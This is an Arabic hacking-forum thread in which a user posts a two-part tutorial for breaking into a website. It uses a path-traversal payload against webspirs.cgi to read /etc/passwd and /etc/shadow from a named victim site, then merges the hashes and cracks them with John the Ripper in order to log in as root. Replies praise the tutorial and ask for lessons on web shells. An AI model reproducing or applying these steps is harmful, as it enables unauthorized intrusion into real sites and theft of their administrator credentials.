شرح اختراق موقع من البداية الى النهاية ....^_^

**مهكر القلوب** · 10-07-2011, 07:17 PM

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته .....
كيفكم يا احلى اعضاء لاحلى منتدى ..... يا رب تكونوا بخير وصحة وسلامة

ملاحظة ..
لازم تعرفون ان الاختراق مايتم الا بوجود ثغره في الموقع !!!

والثغرااات كثير ولكن اكثر الثغراااااا ت تستخدم من نظام لينوكس Linux وتكون مكتوبة بأحد اللغات بيرل او ++C وعند حصول احدنا على ثغره ,,,,,

يحتاج الى مفسر الى اللغة المكتوبه بها الثغره هذه !!!!

وهذه والحمد لله متوفر في Linux .

الان انا ما عندي Linux هذا يعني ما اقدر اخترق موقع ؟؟؟؟؟؟؟

لالالالالالالالالالالالال الالا تقدر ونص !!!!

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

ـــــــــــــــــــــــــ ـــــــــــــــ
نبدأ الان بأول ثغره نقدر نستخدمها من ويندووز !!!

اسهل الثغرااات هي ثغرات CGI وهي كثيره جدا ,,,

اليوم اريد ان اشرح احد هذه الثغرات :

الملف المشكله " او الثغره " يدعى webspirs.cgi هذا الملف هو المساعد على اختراق الموقع !!!

ومنه نستطيع لقط " لطش " ملف الباسووورد !!

الثغره عباره عن اضافة نضيقها الى اسم الموقع ويتم الاختراق بها !!!

ماهي هذه الاضافه ؟؟؟؟؟؟

هي /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd

طيب هي راح تكون على الشكل التالي :

/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwdاسم الموقع اللي بتخترقه

الان انا دورت على موقع نطبق عليه الكلام هذا !!!!!!!!

الموقع الضحيه هو :

http://wilsonweb2.hwwilson.com/

كل ماعلينا هو لصق الثغره في الموقع والحصوووول على ملف الباسووورد !!!! لتصبح على الشطل التالي :

http://wilsonweb2.hwwilson.com/etc/passwd

اممممممممممممممممممممممم الموقع اخترق عن طريق الثغره هذه ممتااااااااز !!!!!

لكن الباسووورد للاسف مشفر !!!! والحل ؟؟؟؟؟

سهل ان شاء الله !!!!

نحتاج الى كود اخر لنكشف التشفير ونغير الكلمات المشفره الى كلمات واضحة ونستنتج الباسووورد للموقع !!!

الان الكلمة المشفره تكون في ملف اسمه shadow كيف نجيبة !!!

بالكود التالي :

/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadow

وبتطبيقه على موقعنا نحصل على :

http://wilsonweb2.hwwilson.com/etc/shadow

الان وجدنا الباسووورد المشفر نحتاج الى شوية تعديلات بسيطة لتكوين ملف وكسر التشفير واستخراج الباسوور للموقع .

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

ـــــــــــــــــــــــــ ـــــ

كيف هذه التعديلات ؟؟؟؟

ملف الشادو به باسوورد الروت " مدير الموقع " root !!!

الان نعمل التالي :

الحين ملف passwd في بعد كل اسم X مثل root:X

من ملف شادو تقارن كل اكس بما يقابله من تشفير وتحطه مكانه ,,,

بالمقارنه بصورة سريعه root:x: = JTTIe4QG268fg:10643 ,,,JTTIe4QG268fg:10643 تبدلها بالاكس

ممكن يكون الملف مختلفه رموزه عندي وعندك !!!

لكن احنا نكرر العمليه على كل اكس في الملف الاول ونغيرها بما يقابلها بالملف الثاني !!

يا شباب الفقره هذه والله صعب شرحها لكن اهم شي التركيز في المكتوب !!!

طيب لما ننسخ ونلصق فين نكتب الناتج ؟؟؟

نكتب الناتج في مستند جديد وليكن الدفتر او صفحة وورد !!!

هذه بدايه بسيطة لمستند الدفتر اللي انا مسويه للبرنامج !!!

root:XOT4AiUKMRcKQ:10643
:0:1:Super-User:/:/sbin/sh daemon:NP:6445
:1:1::/: bin:NP:6445
:2:2::/usr/bin: sys:NP:6445
:3:3::/: adm:NP:6445
:4:4:Admin:/var/adm: lp:NP:6445

اكيد واضحة التغييرات فيه !!!

طيب خلاص زبطنا كل شي الان والمستند جاهز خلصنا !!!!!

لالالالالالالالالالالالال الالالالالالالالالالالالا

لالالالالالالالالالالالال الالالا

باقي نكسر التشفير الان باستخدام برنامج وين البرنامج ؟؟؟؟ وين ؟؟؟

دقيقة اخرفش في اوراقي واجيب لكم الرنامج :

اهاااا هذه وصلة تحميل الرنامج :

http://www.openwall.com/john/john-16d.zip

نزلوا البرنامج واحفظوا مستند الورد حقكم وانتظروني في الدرس القادكم

: كسر التشفيررررررررر "

وربي تعبت من الكتابه اهم شي لا احد يتفلسف ويفتح برنامج كسر الحماية عشان الواحد يبدأ خطوة خطوة !!!

نزل البرنامج وخليه على ضغطه !!!

لا تستعجل جايك بالدرس انا حبيت اعلمك خطوة خطوة ماابي اكثر عليك الدروس بعدين يتشتت ذهنك افهم الدرس وتابع معي الدرس القادم كيف تكسر التشفير !!

=-=-=-=-
نقلته حرف حرف ولا حرف طالع منه ولا منه
(KRKR)
__________________
http://www.m3gic.com/vb/attachment.php?s=&postid=47356

__________________________________________________ _______________
تكملة الدرس
=======
هذا الدرس سيكون تكملة للدرس السابق وهو اختراق المواقع !!!

اليوم سوف نتطرق إلى " أهم خطوة " في الاختراق إلا وهي كسر التشفير !!!

توصلنا في الدرس السابق إلى الكلمة السرية ولكن للأسف كانت مشفره " وهي دائما ما تكون مشفره " !!!

لذا لابد من كسر الشيفره والحصول على الكلمة السرية

خطوات كسر التشفير :

1- أولا قم بفتح الملف المضغوط الموجود على الموقع التالي :

http://www.openwall.com/john/john-16d.zip

عند فكك للضغط سوف تجد الملف المضغوط في unzipped إذا ما تعرف اتبع المسار التالي :
جهاز الكمبيوتر >>> C >>> unzipped

الآن سوف تجد المجلد التالي في unzipped وهو : john-16d

افتح المجلد سوف تجد داخله مجلد بالاسم التالي : JOHN-16

عند فتحك للمجلد سوف تجد مجلدين وهما DOC و RUN

أهم شي عندنا هو مجلد RUN

2- ألان أكيد الكل قام بعمل التغييرات في كلمة السر المشفرة ودمج الملفان مع بعضهما البعض ولم يتبقى إلا حفظ الملف باسم passwd وبدون امتداد !!!!

طيب واللي ما يعرف يحفظ بدون امتداد !!!!! وش يسوي ؟؟؟؟

يتبع الخطوات التالية :
أولا يفتح الملف أكيد أنت كتبته في الورد طيب J اعمل أولا روح إلى حفظ باسم واحفظه باسم passwd

ثم اعمل قص للملف وانسخه في مجلد الويندوز اللي موجود في C
الآن رووح وشغل الدوووووس واكتب التالي :

ren passwd.doc passwd
تأكد انك داخل مجلد ويندوز !!!! من الدوس طبعا اذا لم تكن في داخل ويندوز اكتب التالي windows
cd
ثم اكتب السطر السابق .
بعد ذلك اذهب لمجلد الويندوز وابحث عن passwd ثم اعمل لها قص وارجع إلى ملفنا القدييييييييييييييييم RUN والصقها فيه !!!!

3- الآن لم يتبقى لدينا إلا القليل " هانت يا لربع " !!!!!

افتح الدوس من جديد واكتب التالي :

إذا كنت داخل مجلد ويندوز اكتب مايلي : cd john-16\run

أما إذا كنت على السي اكتب السطرين التاليين :
cd windows ثم انتر
وبعد ذلك اكتب : cd john-16\run ثم انتر

بعد ذلك اكتب السطر التالي :
john -i passwd ثم انتر

الآن سوف يقوم الدوس بكسر الشيفره !!!!

كل ما عليك هو أن تضغط انتر كل خمس دقائق !! وتلاحظ كلمة السر !!!

وسوف تحفظ النتيجة في الملف john.pot الموجود في RNN

وعلى فكره بعض عمليات الكسر تأخذ دقا يق وبعضها ساعات

الآن لم يتبقى سوى اختراق الموقع :

تروح تخترقهم باليوزر root والباسوورد الناتجة عندك

خاتمه :

أنا كتبت هذا الموضوع بأبسط الطرق الممكنة حيث كان بمقدوري شرحه في 10 اسطر ولكن أنا اعتبرت أنني اشرح إلى ناس ليس لديهم خبره في الدوس أو كسر التشفير !!!
:bd: :ab:
__________________

وانشالله يكون وفيت بشرحي
وهده الطريقة انا طبقتها عندي بالينيكس
وطلعت تمام
بس لا تنسونا بردودكم الحلوة .... رجاء

**GMOR** · 10-07-2011, 07:22 PM

~,.بطل يامهكر القلوب~.

.~درس وافي وكافي ياالغلا,.ْ

تحياتي:gmor

**pSyCh0_3D** · 10-07-2011, 07:25 PM

تسلم اخي على الطرح تقبل مروري البسيط

**Ace** · 10-07-2011, 07:27 PM

ينقل خيو المره الجاية التزم بي الاقسام

**مهكر القلوب** · 10-07-2011, 07:45 PM

مشكووووووووووووووووووور على ردودكم الحلوة ما قصرتم بارك الله فيكم

**marcelo** · 10-08-2011, 11:57 AM

nice ya man i like that

**HaCKer011** · 10-08-2011, 08:42 PM

مشكووووووووووووووور
تقبل مروري

**bo.saad** · 10-08-2011, 10:29 PM

يعطيك العافيه اخوي

وجزاك الله الف خير

اخوك ابو سعد

**حنين المجنونه** · 10-13-2011, 12:18 AM

بسراحه موضوع رهيب بس هاذا كان زمان يعني اغلب الثغرات مقفله وانا بسراحه امنيتي اني اتابع شرح اختراق موقع مثلا مقطع فيديو ونطبق يعني مثلا كيف نستهدف الموقع بعد مانستهدف الموقع كيف نحصل ثغره واذا حصلنا ثغره كيف نستخدمها واذا عرفنا كيف نستخدمها كيف نرفع الشل واذا رفعنا الشل كيف نستخدم الشل طبعا الدرووس لازم تكوون على ثغرات جديده هاذي امنيتي بروووب

**حنين المجنونه** · 10-17-2011, 12:39 AM

بطل يسلموووووو على الموضوع اكث من رائع السراحه ياخي تدري ياصاحب الموضوع وش ودي فيه ودي اني القا شرح اختراق المواقع طبعا الشرح راح يكون مقطع فيديو وتطبيق على موقع تقبل مروري يامهكر القلووووووووب ولك احلىى تقييم ياملك بروووب